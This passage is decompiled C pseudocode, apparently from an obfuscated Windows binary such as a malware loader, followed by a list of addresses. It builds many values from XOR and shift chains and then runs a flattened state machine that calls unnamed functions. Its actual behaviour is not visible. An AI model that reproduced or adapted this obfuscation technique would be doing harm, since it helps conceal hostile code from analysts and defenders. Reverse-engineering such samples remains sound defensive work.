				_v324 = _v324 >> 5;
				_v324 = _v324 * 0x44;
				_v324 = _v324 ^ 0x00003473;
				_v448 = 0xeaa9;
				_v448 = _v448 | 0x4138ec1d;
				_v448 = _v448 + 0xffff51b1;
				_v448 = _v448 ^ 0x41382a1b;
				_v176 = 0x21c6;
				_v176 = _v176 | 0xc1f8d3e5;
				_v176 = _v176 ^ 0xc1f8e639;
				_v444 = 0xee7b;
				_v444 = _v444 >> 0xc;
				_v444 = _v444 + 0xf22d;
				_v444 = _v444 ^ 0x00008096;
				_v296 = 0xe06f;
				_v296 = _v296 << 1;
				_v296 = _v296 >> 6;
				_v296 = _v296 ^ 0x0000188b;
				_v292 = 0x5ebb;
				_v292 = _v292 + 0xffff9f3c;
				_v292 = _v292 ^ 0xffffc721;
				_v536 = 0x7dd7;
				_v536 = _v536 | 0xdd9aefff;
				_v536 = _v536 * 0x61;
				_v536 = _v536 ^ 0xf7ba9ffe;
				_v204 = 0x2ee2;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x00004145;
				_v284 = 0xd043;
				_v284 = _v284 ^ 0xcd4d042e;
				_v284 = _v284 ^ 0xcd4dca10;
				_v248 = 0xa312;
				_v248 = _v248 | 0xf3ef4659;
				_v248 = _v248 ^ 0xf3efe95d;
				_v164 = 0x954d;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x0004c997;
				_v600 = 0xcdd0;
				_v600 = _v600 + 0xffffea33;
				_v600 = _v600 | 0xea8150e8;
				_t1401 = 0xa;
				_v600 = _v600 / _t1401;
				_v600 = _v600 ^ 0x177330cb;
				_v496 = 0xaeea;
				_v496 = _v496 ^ 0x492e5da3;
				_v496 = _v496 + 0xe542;
				_t1402 = 0x58;
				_v496 = _v496 / _t1402;
				_v496 = _v496 ^ 0x00d4980e;
				_v388 = 0xcb07;
				_v388 = _v388 >> 8;
				_v388 = _v388 | 0x8fee3084;
				_v388 = _v388 ^ 0x8fee3c84;
				_v308 = 0xcf8f;
				_v308 = _v308 + 0xffff2ac0;
				_v308 = _v308 + 0xd1ee;
				_v308 = _v308 ^ 0x00009d7c;
				_v340 = 0x87a6;
				_v340 = _v340 | 0xc9feff18;
				_v340 = _v340 + 0x4cc1;
				_v340 = _v340 ^ 0xc9ff40b0;
				_v168 = 0x7db;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x007dfac6;
				_v380 = 0x796c;
				_v380 = _v380 << 7;
				_t1286 = 5;
				_t1403 = 0x41;
				_v380 = _v380 * 0x2b;
				_v380 = _v380 ^ 0x0a32e7b7;
				_v236 = 0x93b3;
				_v236 = _v236 / _t1286;
				_v236 = _v236 ^ 0x00004188;
				_v572 = 0xc59a;
				_v572 = _v572 | 0x4410790b;
				_v572 = _v572 << 8;
				_v572 = _v572 ^ 0x77b96c3e;
				_v572 = _v572 ^ 0x674485f0;
				_v580 = 0x420c;
				_v580 = _v580 << 4;
				_v580 = _v580 << 0x10;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 ^ 0x0000e398;
				_v516 = 0xad25;
				_v516 = _v516 >> 3;
				_v516 = _v516 << 7;
				_v516 = _v516 + 0x60df;
				_v516 = _v516 ^ 0x000b2a6c;
				_v524 = 0xdb00;
				_v524 = _v524 + 0xfb0;
				_v524 = _v524 / _t1403;
				_t1404 = 0x5c;
				_v524 = _v524 / _t1404;
				_v524 = _v524 ^ 0x00003f79;
				_v372 = 0xb8ba;
				_v372 = _v372 >> 0xe;
				_v372 = _v372 ^ 0x000034d2;
				_v184 = 0x9f8c;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x00003128;
				_v568 = 0x748c;
				_v568 = _v568 + 0xffffb5cb;
				_t1391 = 0xf;
				_v568 = _v568 / _t1391;
				_t1405 = 0x49;
				_v568 = _v568 * 0x3a;
				_v568 = _v568 ^ 0x0000a9e8;
				_v348 = 0xefd4;
				_v348 = _v348 ^ 0x6490a2e8;
				_v348 = _v348 + 0x9204;
				_v348 = _v348 ^ 0x6490c976;
				_v500 = 0x6bc0;
				_v500 = _v500 >> 7;
				_v500 = _v500 << 8;
				_v500 = _v500 + 0xc413;
				_v500 = _v500 ^ 0x0001f8c3;
				_v208 = 0xf6ba;
				_v208 = _v208 | 0xdd86999b;
				_v208 = _v208 ^ 0xdd86f807;
				_v492 = 0xc6a2;
				_v492 = _v492 / _t1405;
				_v492 = _v492 | 0x8799cdd8;
				_v492 = _v492 >> 1;
				_v492 = _v492 ^ 0x43cccbf1;
				_v344 = 0xa809;
				_v344 = _v344 ^ 0xd4f069ef;
				_v344 = _v344 + 0x8c1d;
				_v344 = _v344 ^ 0xd4f11027;
				_v476 = 0x774c;
				_t1406 = 0x1b;
				_v476 = _v476 * 0x1a;
				_v476 = _v476 << 0xf;
				_v476 = _v476 ^ 0xc578c338;
				_v476 = _v476 ^ 0xcba4ef71;
				_v328 = 0xe058;
				_v328 = _v328 / _t1406;
				_v328 = _v328 * 0x5b;
				_v328 = _v328 ^ 0x0002d02b;
				_v484 = 0x90c3;
				_v484 = _v484 << 0xa;
				_v484 = _v484 + 0x315d;
				_v484 = _v484 ^ 0xfa7bda49;
				_v484 = _v484 ^ 0xf838da10;
				_v336 = 0x7823;
				_v336 = _v336 + 0x96ed;
				_v336 = _v336 ^ 0x41ca6f1d;
				_v336 = _v336 ^ 0x41cb5c66;
				_v596 = 0x2687;
				_v596 = _v596 + 0xffff5b84;
				_v596 = _v596 << 0xc;
				_v596 = _v596 * 0x1e;
				_v596 = _v596 ^ 0x13d4b5f9;
				_v604 = 0xa3e9;
				_v604 = _v604 ^ 0xfce1bef2;
				_v604 = _v604 >> 1;
				_v604 = _v604 + 0x89b7;
				_v604 = _v604 ^ 0x7e710709;
				_v392 = 0xb3d0;
				_t1407 = 0x39;
				_v392 = _v392 / _t1407;
				_v392 = _v392 + 0xffff63f8;
				_v392 = _v392 ^ 0xffff4926;
				_v612 = 0xdb01;
				_v612 = _v612 / _t1391;
				_v612 = _v612 + 0xffffd741;
				_v612 = _v612 ^ 0xf3cfc17a;
				_v612 = _v612 ^ 0x0c30415d;
				_v160 = 0x6c3b;
				_v160 = _v160 ^ 0x93120bcf;
				_v160 = _v160 ^ 0x93125c60;
				_v228 = 0x1bde;
				_t1408 = 0x35;
				_v228 = _v228 / _t1408;
				_v228 = _v228 ^ 0x000035bb;
				_v472 = 0xabed;
				_t1409 = 0x32;
				_t1392 = 0x51;
				_v472 = _v472 * 0x29;
				_v472 = _v472 + 0x6894;
				_v472 = _v472 >> 0xe;
				_v472 = _v472 ^ 0x00000988;
				_v172 = 0xa1fb;
				_v172 = _v172 + 0xffff8a08;
				_v172 = _v172 ^ 0x00005dc8;
				_v220 = 0x89c4;
				_v220 = _v220 | 0xdeadcb77;
				_v220 = _v220 ^ 0xdeadb5ec;
				_v464 = 0x96b9;
				_v464 = _v464 | 0xfffea6b7;
				_v464 = _v464 >> 2;
				_v464 = _v464 ^ 0x3ffff330;
				_v420 = 0x8c64;
				_v420 = _v420 ^ 0x92bb3353;
				_v420 = _v420 >> 0xa;
				_v420 = _v420 ^ 0x0024966e;
				_v608 = 0x3bdd;
				_v608 = _v608 ^ 0x1210bfe3;
				_v608 = _v608 << 6;
				_v608 = _v608 + 0xffffac04;
				_v608 = _v608 ^ 0x842091fd;
				_v300 = 0x3554;
				_v300 = _v300 + 0xffff6e34;
				_v300 = _v300 + 0xffffa25e;
				_v300 = _v300 ^ 0xffff3377;
				_v216 = 0xd781;
				_v216 = _v216 + 0x83c1;
				_v216 = _v216 ^ 0x00014c7e;
				_v352 = 0x620;
				_v352 = _v352 + 0xffffea98;
				_v352 = _v352 * 0x35;
				_v352 = _v352 ^ 0xfffcb4be;
				_v360 = 0x38d8;
				_v360 = _v360 / _t1409;
				_v360 = _v360 * 0x55;
				_v360 = _v360 ^ 0x00004972;
				_v508 = 0xeecd;
				_v508 = _v508 / _t1392;
				_v508 = _v508 ^ 0x9e88c6c6;
				_v508 = _v508 >> 6;
				_v508 = _v508 ^ 0x027a13af;
				_v512 = 0x2962;
				_v512 = _v512 | 0x1fe19e9b;
				_v512 = _v512 + 0xb3d8;
				_v512 = _v512 + 0x6cbd;
				_v512 = _v512 ^ 0x1fe2cc8b;
				_v396 = 0xb1eb;
				_t1410 = 0x6b;
				_v396 = _v396 / _t1410;
				_v396 = _v396 / _t1286;
				_v396 = _v396 ^ 0x00004067;
				_v244 = 0xa835;
				_t1411 = 0x72;
				_v244 = _v244 / _t1411;
				_v244 = _v244 ^ 0x000061a1;
				_v188 = 0x16ec;
				_t1412 = 0x1f;
				_t1287 = 0x76;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x00046e13;
				_v288 = 0x8858;
				_v288 = _v288 + 0x3c92;
				_v288 = _v288 ^ 0x0000be40;
				_v152 = 0xb749;
				_v152 = _v152 / _t1412;
				_v152 = _v152 ^ 0x00005040;
				_v552 = 0xcb86;
				_v552 = _v552 + 0x68d8;
				_v552 = _v552 << 0xa;
				_v552 = _v552 / _t1287;
				_v552 = _v552 ^ 0x000a45a9;
				_v504 = 0x5297;
				_v504 = _v504 | 0xf03128de;
				_v504 = _v504 << 3;
				_v504 = _v504 * 0x51;
				_v504 = _v504 ^ 0xfd3f05fa;
				_v456 = 0x7bf9;
				_v456 = _v456 >> 2;
				_v456 = _v456 ^ 0x2f0bed7b;
				_v456 = _v456 ^ 0x2f0ba3d7;
				_v280 = 0xa9aa;
				_v280 = _v280 + 0xffff7da9;
				_v280 = _v280 ^ 0x000053d7;
				_v452 = 0xe54e;
				_v452 = _v452 << 9;
				_v452 = _v452 / _t1392;
				_v452 = _v452 ^ 0x0005d23d;
				_v272 = 0xbba1;
				_v272 = _v272 * 0x3f;
				_v272 = _v272 ^ 0x002e6555;
				_v256 = 0x556d;
				_v256 = _v256 * 0x4b;
				_v256 = _v256 ^ 0x001960ca;
				_v480 = 0xc654;
				_t1413 = 0x33;
				_v480 = _v480 / _t1413;
				_v480 = _v480 >> 1;
				_v480 = _v480 << 4;
				_v480 = _v480 ^ 0x0000558a;
				_v432 = 0xa6d1;
				_t1414 = 0x78;
				_v432 = _v432 / _t1414;
				_v432 = _v432 + 0x7c7e;
				_v432 = _v432 ^ 0x0000648c;
				_v264 = 0x75d3;
				_v264 = _v264 ^ 0x9aea9891;
				_v264 = _v264 ^ 0x9aeaab3a;
				_v428 = 0x6a45;
				_v428 = _v428 << 9;
				_v428 = _v428 << 0xd;
				_v428 = _v428 ^ 0x91400595;
				_v364 = 0x6f7d;
				_t1415 = 0x4f;
				_v364 = _v364 * 0xa;
				_v364 = _v364 * 0x2d;
				_v364 = _v364 ^ 0x00c3d551;
				_v436 = 0x7194;
				_v436 = _v436 << 0xe;
				_v436 = _v436 << 0xf;
				_v436 = _v436 ^ 0x80005fe7;
				_v332 = 0x72bf;
				_v332 = _v332 >> 3;
				_v332 = _v332 ^ 0xbd8bba7a;
				_v332 = _v332 ^ 0xbd8bad57;
				_v528 = 0xfbe3;
				_v528 = _v528 + 0x109e;
				_v528 = _v528 << 6;
				_v528 = _v528 ^ 0x19958ec7;
				_v528 = _v528 ^ 0x19d6e9e1;
				_v276 = 0x6210;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x000c3116;
				_v592 = 0x47f3;
				_v592 = _v592 + 0xfffff129;
				_v592 = _v592 >> 0xd;
				_v592 = _v592 * 0x65;
				_v592 = _v592 ^ 0x000023dc;
				_v368 = 0x5e76;
				_v368 = _v368 << 1;
				_v368 = _v368 + 0xffffebab;
				_v368 = _v368 ^ 0x0000f9a9;
				_v540 = 0xb1ba;
				_v540 = _v540 + 0xffff2f03;
				_v540 = _v540 ^ 0x456dd435;
				_v540 = _v540 / _t1415;
				_v540 = _v540 ^ 0x025c94ea;
				_v488 = 0xa3a0;
				_v488 = _v488 | 0x29558c36;
				_v488 = _v488 * 0x52;
				_v488 = _v488 >> 7;
				_v488 = _v488 ^ 0x007a9d5c;
				_v404 = 0xbd87;
				_v404 = _v404 | 0x1f6fe8ad;
				_v404 = _v404 + 0xffff44e1;
				_v404 = _v404 ^ 0x1f6f0020;
				_v252 = 0x32cd;
				_v252 = _v252 + 0xffff80e8;
				_v252 = _v252 ^ 0xffffc7ba;
				_v576 = 0xf940;
				_v576 = _v576 + 0xffffa78d;
				_t1416 = 0x22;
				_v576 = _v576 * 0x6d;
				_v576 = _v576 << 0xf;
				_v576 = _v576 ^ 0x3ba4bc13;
				_v468 = 0xcb5;
				_v468 = _v468 << 0xe;
				_v468 = _v468 >> 1;
				_v468 = _v468 / _t1416;
				_v468 = _v468 ^ 0x000bb40c;
				_v192 = 0xcc11;
				_v192 = _v192 + 0xffffa2c3;
				_v192 = _v192 ^ 0x0000460e;
				_v320 = 0xf96;
				_v320 = _v320 << 1;
				_v320 = _v320 ^ 0xa5b2d99c;
				_v320 = _v320 ^ 0xa5b2df36;
				_v200 = 0xbc2;
				_v200 = _v200 + 0xa28e;
				_v200 = _v200 ^ 0x0000f021;
				_v548 = 0xe226;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x4c92e9f4;
				_v548 = _v548 ^ 0x6d88dd25;
				_v548 = _v548 ^ 0x211d7baa;
				_v556 = 0xc029;
				_v556 = _v556 | 0xafe7faac;
				_t1417 = 3;
				_v556 = _v556 * 0x29;
				_v556 = _v556 + 0x66dc;
				_v556 = _v556 ^ 0x2c2783fd;
				_v564 = 0xcddf;
				_v564 = _v564 | 0x69cce809;
				_v564 = _v564 + 0x1c8f;
				_v564 = _v564 | 0x9b91da16;
				_v564 = _v564 ^ 0xfbddf591;
				_v376 = 0xdbf0;
				_v376 = _v376 + 0xffff5ef6;
				_v376 = _v376 + 0x881a;
				_v376 = _v376 ^ 0x00009a9f;
				_v584 = 0x284;
				_v584 = _v584 << 0xa;
				_v584 = _v584 + 0xffffb7a6;
				_v584 = _v584 / _t1417;
				_v584 = _v584 ^ 0x0003190f;
				_v196 = 0x43cc;
				_v196 = _v196 << 6;
				_v196 = _v196 ^ 0x0010940d;
				_v268 = 0xd3cd;
				_v268 = _v268 << 3;
				_v268 = _v268 ^ 0x0006aa73;
				_v356 = 0xfeac;
				_v356 = _v356 + 0x19fd;
				_v356 = _v356 ^ 0xd0ef3018;
				_v356 = _v356 ^ 0xd0ee4147;
				_v304 = 0x8b2f;
				_v304 = _v304 << 3;
				_v304 = _v304 | 0x216bae77;
				_v304 = _v304 ^ 0x216fb82e;
				_v312 = 0x842;
				_v312 = _v312 + 0xffffcb0b;
				_v312 = _v312 + 0xffff0185;
				_v312 = _v312 ^ 0xfffece92;
				_v180 = 0x445;
				_v180 = _v180 >> 0xd;
				_v180 = _v180 ^ 0x00004e36;
				_v560 = 0x7ecd;
				_v560 = _v560 | 0x1b6ab905;
				_v560 = _v560 * 0x14;
				_v560 = _v560 + 0xffff090e;
				_v560 = _v560 ^ 0x245b1838;
				_v316 = 0xf7be;
				_t1418 = 0x31;
				_v316 = _v316 / _t1418;
				_v316 = _v316 + 0x4e32;
				_v316 = _v316 ^ 0x0000257f;
				_v460 = 0x4b6c;
				_v460 = _v460 << 0xf;
				_v460 = _v460 | 0x579879a9;
				_t1419 = 0x15;
				_v460 = _v460 * 0x69;
				_v460 = _v460 ^ 0x1d1f909c;
				_v532 = 0x5c00;
				_v532 = _v532 ^ 0x1c3d3198;
				_v532 = _v532 + 0x1b65;
				_v532 = _v532 | 0x76fabaf6;
				_v532 = _v532 ^ 0x7effbaff;
				_v224 = 0x4730;
				_v224 = _v224 / _t1419;
				_v224 = _v224 ^ 0x013462ab;
				_v232 = 0xd2aa;
				_v232 = _v232 * 0xf;
				_v232 = _v232 ^ 0x000c4086;
				_v212 = 0xc9c0;
				_v212 = _v212 >> 2;
				_v212 = _v212 ^ 0x00003271;
				_v588 = 0x8e1e;
				_v588 = _v588 << 0xe;
				_v588 = _v588 / _t1287;
				_v588 = _v588 + 0x70b0;
				_v588 = _v588 ^ 0x004d8aec;
				_v384 = 0x3f9a;
				_v384 = _v384 ^ 0xaa043434;
				_v384 = _v384 + 0xffff10d6;
				_v384 = _v384 ^ 0xaa0303c4;
				_v440 = 0x7da4;
				_v440 = _v440 ^ 0xe798b77d;
				_v440 = _v440 >> 3;
				_v440 = _v440 ^ 0x1cfea2fb;
				_v544 = 0x6835;
				_v544 = _v544 ^ 0xbf0c3147;
				_v544 = _v544 >> 7;
				_v544 = _v544 << 6;
				_v544 = _v544 ^ 0x5f88d8a0;
				_v424 = 0x3a6a;
				_v424 = _v424 | 0x20761b11;
				_v424 = _v424 << 5;
				_v424 = _v424 ^ 0x0ec760c0;
				_v416 = 0x5aa4;
				_v416 = _v416 >> 0xa;
				_v416 = _v416 >> 5;
				_v416 = _v416 ^ 0x00001f40;
				while(1) {
					L1:
					_t1166 = 0x1347b7a7;
					do {
						while(1) {
							L2:
							_t1433 = _t1290 - 0x18f54dcc;
							if(_t1433 > 0) {
								break;
							}
							if(_t1433 == 0) {
								E001FA176();
								E001F164C();
								asm("sbb ecx, ecx");
								_t1290 = (_t1290 & 0xecdae413) + 0x3448ab6b;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							_t1434 = _t1290 - 0xcc27a1e;
							if(_t1434 > 0) {
								__eflags = _t1290 - _t1166;
								if(__eflags > 0) {
									__eflags = _t1290 - 0x16c53265;
									if(_t1290 == 0x16c53265) {
										_t1166 = E0020B3FE();
										__eflags = _t1166;
										if(_t1166 == 0) {
											L109:
											return _t1166;
										}
										_t1290 = 0x18f54dcc;
										while(1) {
											L1:
											_t1166 = 0x1347b7a7;
											goto L2;
										}
									}
									__eflags = _t1290 - 0x17309102;
									if(_t1290 == 0x17309102) {
										E002055FA( &_v80, _v512, _v396);
										_t1290 = 0x17c2b24e;
										while(1) {
											L1:
											_t1166 = 0x1347b7a7;
											goto L2;
										}
									}
									__eflags = _t1290 - 0x17a0c50f;
									if(_t1290 == 0x17a0c50f) {
										E0020B1D2();
										_t1290 = 0xcc27a1e;
										while(1) {
											L1:
											_t1166 = 0x1347b7a7;
											goto L2;
										}
									}
									__eflags = _t1290 - 0x17c2b24e;
									if(_t1290 != 0x17c2b24e) {
										goto L104;
									}
									E00204693( &_v112, _v244,  &_v132, _v188);
									_pop(_t1310);
									asm("sbb ecx, ecx");
									_t1290 = (_t1310 & 0xf343a4d6) + 0x28b834f4;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								if(__eflags == 0) {
									_t1166 = E001F421E();
									goto L109;
								}
								__eflags = _t1290 - 0xd04e189;
								if(_t1290 == 0xd04e189) {
									E001F91CD(_v488, _v404, _v252, _v140, _v576);
									_t1430 = _t1430 + 0xc;
									L44:
									_t1290 = 0x2e96a45f;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0xef17693;
								if(_t1290 == 0xef17693) {
									E001F6BC0();
									asm("sbb ecx, ecx");
									_t1290 = (_t1290 & 0xfc14d350) + 0x4381151;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0x124b7e54;
								if(_t1290 == 0x124b7e54) {
									_t1166 = E001F9CC8();
									__eflags = _t1166;
									if(_t1166 == 0) {
										goto L109;
									}
									E002077B8(_v520);
									_t1290 = 0xef17693;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0x1314054e;
								if(_t1290 != 0x1314054e) {
									goto L104;
								}
								E001F91CD(_v584, _v196, _v268, _v88, _v356);
								_t1430 = _t1430 + 0xc;
								L39:
								_t1290 = 0x1d3feeae;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(_t1434 == 0) {
								_t1290 = 0x30bd18dd;
								continue;
							}
							_t1435 = _t1290 - 0x679c612;
							if(_t1435 > 0) {
								__eflags = _t1290 - 0xa42f83d;
								if(_t1290 == 0xa42f83d) {
									_v72 = E001F89BA();
									_t1290 = 0xc79baa;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0xaae0b9b;
								if(_t1290 == 0xaae0b9b) {
									E0020990E();
									_t1290 = 0x28928226;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0xaff942a;
								if(_t1290 == 0xaff942a) {
									E002099A4();
									_t1290 = 0x4ce4a1;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0xb5fcab4;
								if(_t1290 != 0xb5fcab4) {
									goto L104;
								}
								_v100 = E001F934C(_t1290);
								_t1290 = 0x2e7804b1;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(_t1435 == 0) {
								_t1220 = E0020DB25(_v428, _v364,  &_v124, _v436,  &_v140, _v332);
								_t1430 = _t1430 + 0x10;
								__eflags = _t1220;
								if(_t1220 == 0) {
									L92:
									_t1290 = 0xd04e189;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								E002053A7();
								__eflags = _v116;
								_t1290 = 0xaae0b9b;
								if(_v116 == 0) {
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _v116 - 7;
								_t1166 = 0x1347b7a7;
								_t1290 =  ==  ? 0x1347b7a7 : 0xaae0b9b;
								continue;
							}
							if(_t1290 == 0x4ce4a1) {
								E002093C9();
								_t1290 = 0x16c53265;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(_t1290 == 0xc79baa) {
								_v104 = E00200F6D();
								_t1290 = 0xb5fcab4;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(_t1290 == 0x1d0f464) {
								_t1166 = E0020EDB9();
								goto L109;
							}
							if(_t1290 == 0x28f1cb3) {
								E00205115();
								asm("sbb ecx, ecx");
								_t1316 = _t1290 & 0xea302f55;
								L15:
								_t1290 = _t1316 + 0x17a0c50f;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(_t1290 != 0x4381151) {
								goto L104;
							}
							if(E002037F4() == 0) {
								E001F164C();
								asm("sbb ecx, ecx");
								_t1290 = (_t1290 & 0x0e0cc21c) + 0xaff942a;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							E001F164C();
							asm("sbb ecx, ecx");
							_t1316 = _t1290 & 0xeaee57a4;
							goto L15;
						}
						__eflags = _t1290 - 0x24211e99;
						if(__eflags > 0) {
							__eflags = _t1290 - 0x2e7804b1;
							if(__eflags > 0) {
								__eflags = _t1290 - 0x2e96a45f;
								if(_t1290 == 0x2e96a45f) {
									E001F91CD(_v468, _v192, _v320, _v132, _v200);
									_t1430 = _t1430 + 0xc;
									_t1290 = 0x28b834f4;
									L103:
									_t1166 = 0x1347b7a7;
									goto L104;
								}
								__eflags = _t1290 - 0x30bd18dd;
								if(__eflags == 0) {
									_push(_t1290);
									_v148 = E001F93FA(_v500, _v208, __eflags,  &_v144);
									E0020D2CB(_v492, __eflags, _v344,  &_v148);
									E0020C5F7(_v476, _v328, _v484, _v336, _v148);
									_t1430 = _t1430 + 0x1c;
									_t1290 = 0x2c7ff3b0;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0x33503405;
								if(_t1290 == 0x33503405) {
									E0020231B(_v216, _v352,  &_v88, _v360, _v508);
									_t1430 = _t1430 + 0xc;
									_t1290 = 0x17309102;
									while(1) {
										L1:
										_t1166 = 0x1347b7a7;
										goto L2;
									}
								}
								__eflags = _t1290 - 0x3448ab6b;
								if(_t1290 != 0x3448ab6b) {
									goto L104;
								}
								E001FCA1D();
								_t1290 = 0x1d0f464;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							if(__eflags == 0) {
								_t1290 = 0x2482a92f;
								_v96 = _v224;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							__eflags = _t1290 - 0x2482a92f;
							if(_t1290 == 0x2482a92f) {
								_t1290 = 0x33503405;
								_v92 = _v232;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							__eflags = _t1290 - 0x28928226;
							if(__eflags == 0) {
								_t1180 = E00208831(_v368,  &_v124, __eflags, _v540);
								__eflags = _t1180;
								if(_t1180 != 0) {
								}
								goto L92;
							}
							__eflags = _t1290 - 0x28b834f4;
							if(_t1290 == 0x28b834f4) {
								E001F91CD(_v548, _v556, _v564, _v80, _v376);
								_t1430 = _t1430 + 0xc;
								_t1290 = 0x1314054e;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							__eflags = _t1290 - 0x2c7ff3b0;
							if(_t1290 != 0x2c7ff3b0) {
								goto L104;
							}
							_t1290 = 0x217a1233;
							goto L2;
						}
						if(__eflags == 0) {
							_t1290 = 0x2342e4cf;
							goto L2;
						}
						__eflags = _t1290 - 0x1fcd18b3;
						if(__eflags > 0) {
							__eflags = _t1290 - 0x20b99456;
							if(_t1290 == 0x20b99456) {
								_t1166 = E001F9AE1(_t1290);
								goto L109;
							}
							__eflags = _t1290 - 0x21238f7e;
							if(_t1290 == 0x21238f7e) {
								E001FF813();
								_t1290 = 0x3448ab6b;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							__eflags = _t1290 - 0x217a1233;
							if(__eflags == 0) {
								_push(_t1290);
								E001F607F(_t1290, __eflags, _t1290, _v384, _v588);
								_t1430 = _t1430 + 0x10;
								goto L39;
							}
							__eflags = _t1290 - 0x2342e4cf;
							if(__eflags != 0) {
								goto L104;
							}
							_t1166 = E0020992F(__eflags);
							__eflags = _t1166;
							if(_t1166 == 0) {
								goto L109;
							}
							_t1290 = 0x1fcd18b3;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						if(__eflags == 0) {
							E0020B01E();
							_t1290 = 0x124b7e54;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x190c5646;
						if(_t1290 == 0x190c5646) {
							E001F704B();
							_t1290 = 0xaff942a;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x1bfbd9ca;
						if(_t1290 == 0x1bfbd9ca) {
							_push(_v552);
							_push(_v212);
							_t1299 = _v288;
							_push( &_v140);
							_push( &_v132);
							_t1265 = E00209DC0(_t1299, _v152);
							_t1431 = _t1430 + 0x10;
							__eflags = _t1265;
							if(__eflags == 0) {
								E00206536();
								_t1424 = 0x33503405;
								_push(_t1299);
								_t1272 = E001F607F(_t1299, __eflags, _t1299, _v416, _v424);
								_t1430 = _t1431 + 0x10;
								_t1397 = _t1272;
								goto L44;
							}
							_t1424 = 0x33503405;
							_push(_t1299);
							_t1277 = E001F607F(_t1299, __eflags, _t1299, _v544, _v440);
							_t1430 = _t1431 + 0x10;
							_t1397 = _t1277;
							_t1290 = 0x679c612;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x1c2cf691;
						if(_t1290 == 0x1c2cf691) {
							_t1278 = E00204E4B( &_v68, _v160, _v228, _v472);
							_t1430 = _t1430 + 0xc;
							__eflags = _t1278;
							if(_t1278 == 0) {
								L64:
								_t1290 = 0x20b99456;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							_v112 =  &_v68;
							_v108 = E001FD013( &_v68, _v172, _v220);
							_t1290 = 0xa42f83d;
							goto L1;
						}
						__eflags = _t1290 - 0x1d3feeae;
						if(__eflags != 0) {
							goto L104;
						}
						_push(_t1290);
						_push(_t1290);
						_t1284 = E0020E0D0(_t1397, __eflags);
						__eflags = _t1284;
						if(_t1284 == 0) {
							_t1290 = _t1424;
							goto L103;
						}
						goto L64;
						L104:
						__eflags = _t1290 - 0x24c87c39;
					} while (_t1290 != 0x24c87c39);
					goto L109;
				}
			}

0x001fdc35
0x001fdc3b
0x001fdc48
0x001fdc4f
0x001fdc54
0x001fdc5f
0x001fdc6a
0x001fdc75
0x001fdc80
0x001fdc8b
0x001fdc9d
0x001fdca2
0x001fdca8
0x001fdcad
0x001fdcb5
0x001fdcbd
0x001fdcc8
0x001fdcd3
0x001fdcde
0x001fdce9
0x001fdcf4
0x001fdcff
0x001fdd0a
0x001fdd12
0x001fdd1a
0x001fdd1f
0x001fdd27
0x001fdd2f
0x001fdd3a
0x001fdd42
0x001fdd4d
0x001fdd58
0x001fdd6a
0x001fdd6d
0x001fdd74
0x001fdd7f
0x001fdd8a
0x001fdd9a
0x001fdda1
0x001fddac
0x001fddb7
0x001fddc2
0x001fddcd
0x001fddd8
0x001fdde3
0x001fddee
0x001fddf9
0x001fde04
0x001fde0c
0x001fde17
0x001fde22
0x001fde2d
0x001fde34
0x001fde3c
0x001fde47
0x001fde52
0x001fde5d
0x001fde68
0x001fde70
0x001fde7d
0x001fde81
0x001fde89
0x001fde94
0x001fde9c
0x001fdea7
0x001fdeb2
0x001fdebd
0x001fdec8
0x001fded3
0x001fdee0
0x001fdeeb
0x001fdef6
0x001fdefe
0x001fdf09
0x001fdf11
0x001fdf19
0x001fdf27
0x001fdf2c
0x001fdf32
0x001fdf3a
0x001fdf45
0x001fdf50
0x001fdf62
0x001fdf67
0x001fdf70
0x001fdf7b
0x001fdf86
0x001fdf8e
0x001fdf99
0x001fdfa4
0x001fdfaf
